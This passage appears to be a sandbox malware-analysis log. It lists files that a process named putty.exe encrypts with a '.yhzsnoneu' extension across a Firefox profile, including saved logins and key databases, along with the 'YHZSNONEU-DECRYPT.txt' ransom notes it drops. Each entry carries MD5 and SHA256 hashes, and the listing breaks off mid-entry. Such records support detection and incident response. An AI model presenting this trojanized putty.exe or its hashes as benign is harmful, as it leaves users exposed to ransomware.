C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionstore.jsonlz4.yhzsnoneu
binary
MD5: bc97050912805ce5a61949f205daaaae
SHA256: 0a11ece324dbc0d4494ed32dabbc1b5a910105497f146c103e41456bd067a525
3020
putty.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionstore-backups\previous.jsonlz4.yhzsnoneu
binary
MD5: 4963a757865015986798dda7d064b998
SHA256: 04906719a138a2532cefda4d1fcbbd48132e1ac26808ddb40a1fc69e069c96b2
3020
putty.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionstore.jsonlz4
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionstore-backups\previous.jsonlz4
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionCheckpoints.json.yhzsnoneu
binary
MD5: 8602e1927f0033b1e03c22da539ffc06
SHA256: 930614e083c3cb66d8dff714d91acdabbeddc0fc8956bc0a7d591b66546dc335
3020
putty.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionstore-backups\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\search.json.mozlz4.yhzsnoneu
binary
MD5: 9452fd474500d2d876ec11185b4fb324
SHA256: 1f214c8421f9a60618c1cc2d8d7daf7fb5024f77227e9964b8364190123cff82
3020
putty.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\sessionCheckpoints.json
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\search.json.mozlz4
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\revocations.txt.yhzsnoneu
binary
MD5: 6c5a77b07df1238431ff8fb55b5c46a3
SHA256: d51e0f4ecc46804633b854bd97d758b59228349d44fb62dbf357242e988fe0c2
3020
putty.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\prefs.js.yhzsnoneu
binary
MD5: e5e646cef6d29df0410e8588d9aaa347
SHA256: b28570d38fac38815110da277bd2491082418acd6103b86c2a50b5fda50c6254
3020
putty.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\saved-telemetry-pings\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\revocations.txt
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\prefs.js
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\pluginreg.dat.yhzsnoneu
binary
MD5: a25350a2b75744efc8b5c0f35c5f1f9d
SHA256: e4f7ee930e5f3c87f3311c4c2fcaa21629af54e4ba0a1947a6042d88abe977b6
3020
putty.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\pluginreg.dat
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\places.sqlite.yhzsnoneu
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\places.sqlite
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\logins.json.yhzsnoneu
binary
MD5: 0e742082a1cdfb1cc4e0a8d9c9c3cf2c
SHA256: 8bece74964f0485cfb6385614d4777e08c266405c62ca8ecd648ac2e396909ba
3020
putty.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\permissions.sqlite.yhzsnoneu
binary
MD5: 70d06e80b990b745593eaffe5a7fe940
SHA256: 2a114bf1f1d483b9d2de794dc6008a2677b3ed7f531ac5a450473c2d9eeb87a4
3020
putty.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\pkcs11.txt.yhzsnoneu
binary
MD5: f9340e0001717214c4e11bf5fca6c9a5
SHA256: b7b192010b6970028d91535fbc4fe203944aa17f28a72ba05b482eccafde3404
3020
putty.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\minidumps\YHZSNONEU-DECRYPT.txt
text
MD5: 045034ddc83e7c7932412a6371c056dc
SHA256: 966363663b77603773738d8d41c3d30eb9bc610d972a846e65e7d5c53dc65da4
3020
putty.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\pkcs11.txt
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\permissions.sqlite
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\logins.json
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\key4.db.yhzsnoneu
binary
MD5: 1aa6fe8e325cb8f921172ad971c8d6ff
SHA256: 7bde326cf68f29d13a3b46a5daac3ec88730de250a0446ea544279be8de1f2ad
3020
putty.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\key4.db
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\handlers.json.yhzsnoneu
binary
MD5: a69cf4c652ac0f1bf616df81d5d00b1d
SHA256: 1adf8b65f219773b7e1c7b158a4709cdf2e40c40ce69d9daeb0a998b70d6f6c5
3020
putty.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\handlers.json
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\widevinecdm.dll.sig.yhzsnoneu
binary
MD5: 9ae83b975df6cf116604dc42c4abdc67
SHA256: 6229963db574d24cf917c011cd27097a053d3edf0ed47dcfd764aea04dec08fd
3020
putty.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\widevinecdm.dll.lib.yhzsnoneu
binary
MD5: d325981ce6108792de4ff5a1678e268b
SHA256: 2312954764ec81d78261f6e575874c8fe7624953c33707e78cd97b293a3257a6
3020
putty.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\widevinecdm.dll.sig
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\widevinecdm.dll.lib
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\manifest.json.yhzsnoneu
binary
MD5: 6367effc04f2785a17c4a8cc41163a65
SHA256: 51a326dbd38a47f78b81156fed48878429c43157c94bc62eec0175f1f65c91e3
3020
putty.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\manifest.json
––
MD5:  ––
SHA256:  ––
3020
putty.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\gmp-widevinecdm\1.4.8.1008\LICENSE.txt.yhzsnoneu
binary
M